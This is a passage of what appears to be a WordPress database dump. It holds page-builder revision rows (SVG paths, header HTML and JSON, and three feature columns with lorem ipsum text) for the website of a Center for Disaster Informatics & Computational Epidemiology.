d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:40:57','2022-02-16 15:40:57','',22,'https://gsudice.dataconn.net/?p=290',0,'revision','',0),(294,1,'2022-02-16 15:41:15','2022-02-16 15:41:15','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:41:15','2022-02-16 15:41:15','',168,'https://gsudice.dataconn.net/?p=294',0,'revision','',0),(295,1,'2022-02-16 15:41:15','2022-02-16 15:41:15','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">population disparities</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n 